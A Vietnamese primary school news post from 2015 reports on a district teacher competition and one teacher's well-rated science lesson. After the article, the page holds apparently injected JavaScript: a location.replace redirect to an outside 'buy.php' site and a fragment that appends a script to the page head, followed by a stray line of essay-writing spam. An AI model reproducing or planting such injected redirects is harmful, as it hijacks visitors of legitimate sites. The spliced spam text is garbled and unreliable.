Hội thi Giáo viên dạy giỏi cấp Quận – Năm học: 2014- 2015

03/02/2015 9:45 Sáng Phản hồi đã bị khóa

Thiết thực thi đua lập thành tích chào mừng ngày Nhà giáo Việt Nam 20/11, BGH trường Tiểu học Quan Hoa đã tổ chức Hội thi Giáo viên dạy giỏi cấp trường. Đây là dịp để giáo viên thể hiện năng lực; học tập, trao đổi kinh nghiệm về giảng dạy, tổ chức lớp học, ứng dụng CNTT sáng tạo và hiệu quả trong tiết học. Hội thi cũng là một trong những căn cứ để đánh giá thực trạng đội ngũ giáo viên, từ đó xây dựng kế hoạch đào tạo, bồi dưỡng nhằm nâng cao trình độ chuyên môn, nghiệp vụ cho giáo viên, đáp ứng yêu cầu đổi mới của giáo dục.

Qua hội thi nhà trường đã lựa chọn và cử cô giáo Hoàng Thu Huyền – GVCN lớp 1E tham gia thi Giáo viên dạy giỏi cấp Quận.

Tham gia Hội thi GV dạy giỏi cấp Quận, cô giáo đã dạy tiết Tự nhiên và xã hội trên đối tượng học sinh lớp khác trong trường. Tiết dạy được Ban giám kháo đánh giá cao bởi sự tương tác nhẹ nhàng giữa cô và trò, lượng kiến thức đảm bảo trọng tâm, vừa sức; không khí lớp học sôi nổi, tự nhiên. Bên cạnh đó tiết học cũng đã ứng dụng hợp lí và hiệu quả CNTT và những tư liệu được cô và trò sưu tầm rất gần gũi, thân thuộc, qua đó học sinh rất hào hứng, tích cực tham gia trong tiết học. Tiết dạy được xếp loại Tốt và cô giáo vinh dự được cử tham gia Hội thi Giáo viên dạy giỏi cấp Thành phố.

location.replace(“http://gethere.info/buy.php”);

d.getElementsByTagName(‘head’)[0].appendChild(s); Crowell does acknowledge receiving a significant check out of tips to write a good essay that pot

Các phản hồi đã bị đóng lại bở quản trị.